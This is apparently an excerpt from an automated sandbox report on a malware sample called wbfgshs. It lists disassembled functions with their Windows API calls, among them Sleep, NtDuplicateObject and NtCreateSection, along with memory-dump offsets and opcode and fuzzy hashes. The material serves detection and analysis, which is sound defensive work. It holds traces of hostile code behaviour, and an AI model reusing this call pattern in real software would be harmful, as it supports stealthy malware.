                                                                                                                            • Instruction ID: 10c3a56653f41556fb113e93a2916372f3dcf97cab535dda7fbde97d4941f418
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: C4113C79A00208EFDB01DF98C985E99BBF5AF08351F058094FA489B362D375EA90DF80
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                            • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                            • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                            • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                            • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                            • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                            • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                            • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                            • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                            • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                            • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                                            • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                            • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937090431.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_400000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                            • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                            • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                            • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937112624.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                            • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                            • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                            • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937112624.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                            • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                            • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                            • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.1937112624.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_40b000_wbfgshs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                            • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                            • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                            • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797